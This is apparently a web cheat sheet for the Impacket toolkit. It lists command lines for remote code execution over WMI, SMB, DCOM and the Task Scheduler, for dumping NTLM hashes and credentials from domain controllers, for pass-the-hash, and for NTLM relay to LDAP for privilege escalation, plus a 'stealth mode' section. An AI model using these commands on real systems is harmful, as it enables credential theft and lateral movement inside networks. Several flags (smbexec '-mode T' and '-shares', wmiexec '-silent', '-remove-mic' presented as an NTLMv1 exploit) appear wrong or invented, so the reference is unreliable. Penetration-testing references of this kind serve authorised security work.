Impacket

impacket logo
Impacket is a collection of Python scripts and libraries used for penetration testing and security assessments. It provides tools for working with network protocols, exploiting vulnerabilities, and performing post-exploitation tasks. Penetration testers utilize Impacket for tasks ranging from network reconnaissance and credential extraction to remote code execution and lateral movement within networks.
Navigation
  • Installation and Setup
  • Tools Overview
  • wmiexec.py – Remote Command Execution via WMI
  • psexec.py – Remote Execution Over SMB
  • smbexec.py – Execute Commands via SMB
  • dcomexec.py – Remote Execution via DCOM
  • atexec.py – Task Scheduler Execution
  • secretsdump.py – Extract Credentials and Hashes
  • rpcdump.py – Dump RPC Endpoints
  • samrdump.py – Enumerate SAM Accounts
  • ntlmrelayx.py – NTLM Relay Attacks
  • Performance Tuning and Stealth Mode
  • Best Practices

Installation and Setup

Install on Kali Linux

sudo apt update && sudo apt install impacket-scripts

Install on Debian/Ubuntu

sudo apt update && sudo apt install python3-impacket

Install via pipx (Recommended)

python3 -m pipx install impacket

Install from Source

git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

Tools Overview

Impacket provides tools for interacting with Windows networking, SMB, Kerberos, Active Directory, and other protocols. I have listed and created a cheat sheet for the most common ones I use in penetration testing.

wmiexec.py – Remote Command Execution via WMI

wmiexec.py DOMAIN/USER:PASSWORD@TARGET                               #Execute command remotely via WMI
wmiexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                     #Use NTLM Hash for Authentication
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Suppress command output
wmiexec.py -A DOMAIN/USER@TARGET                                     #Prompt for Password Instead of Providing in Command

psexec.py – Remote Execution Over SMB

psexec.py DOMAIN/USER:PASSWORD@TARGET                                #Execute commands via SMB Named Pipes
psexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                      #Use NTLM Hash for Authentication
psexec.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET            #Specify Target IP
psexec.py -service-name CustomSvc DOMAIN/USER:PASSWORD@TARGET        #Customize Service Name

smbexec.py – Execute Commands via SMB

smbexec.py DOMAIN/USER:PASSWORD@TARGET                               #Execute commands interactively over SMB
smbexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                     #Pass-the-Hash Execution
smbexec.py -shares DOMAIN/USER:PASSWORD@TARGET                       #List SMB Shares
smbexec.py -mode T DOMAIN/USER:PASSWORD@TARGET                       #Run Commands via Task Scheduler Instead of Service

dcomexec.py – Remote Execution via DCOM

dcomexec.py DOMAIN/USER:PASSWORD@TARGET                              #Execute commands over DCOM
dcomexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Pass-the-Hash Execution
dcomexec.py -object MMC20 DOMAIN/USER:PASSWORD@TARGET                #Use MMC20 DCOM Object

atexec.py – Task Scheduler Execution

atexec.py DOMAIN/USER:PASSWORD@TARGET                                #Execute Commands via Task Scheduler
atexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                      #Use NTLM Hash for Authentication
atexec.py -debug DOMAIN/USER:PASSWORD@TARGET                         #Enable Debug Mode

secretsdump.py – Extract Credentials and Hashes

secretsdump.py DOMAIN/USER:PASSWORD@TARGET                           #Dump NTLM Hashes & Credentials
secretsdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                 #Use Pass-the-Hash
secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@TARGET             #Dump Only NTLM Hashes from DC
secretsdump.py -outputfile hashes.txt DOMAIN/USER:PASSWORD@TARGET    #Save Hashes to File

rpcdump.py – Dump RPC Endpoints

rpcdump.py DOMAIN/USER:PASSWORD@TARGET                               #List Exposed RPC Endpoints
rpcdump.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET           #Specify Target IP

samrdump.py – Enumerate SAM Accounts

samrdump.py DOMAIN/USER:PASSWORD@TARGET                              #Enumerate SAM User Accounts
samrdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Use NTLM Hash for Authentication

ntlmrelayx.py – NTLM Relay Attacks

ntlmrelayx.py -t TARGET                                              #Relay NTLM Authentication to Target
ntlmrelayx.py -smb2support -t TARGET                                 #Enable SMBv2 Support
ntlmrelayx.py -t ldap://DC_IP --delegate-access                      #Relay to LDAP for Privilege Escalation
ntlmrelayx.py -remove-mic -t TARGET                                  #Remove MIC to Exploit NTLMv1

Performance Tuning and Stealth Mode

wmiexec.py -silent DOMAIN/USER:PASSWORD@TARGET                       #Silent Execution
secretsdump.py -no-pass DOMAIN/USER@TARGET                           #Extract Hashes Without Password
ntlmrelayx.py -no-wcf -debug -t TARGET                               #Disable WCF and Enable Debugging
psexec.py -no-output DOMAIN/USER:PASSWORD@TARGET                     #Suppress Command Output

Best Practices

secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@TARGET             #Extract Only NTLM Hashes
ntlmrelayx.py -t ldap://DC_IP --delegate-access                      #Relay NTLM to LDAP for Privilege Escalation
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Suppress Command Output
smbexec.py -mode T DOMAIN/USER:PASSWORD@TARGET                       #Use Task Scheduler Mode for Execution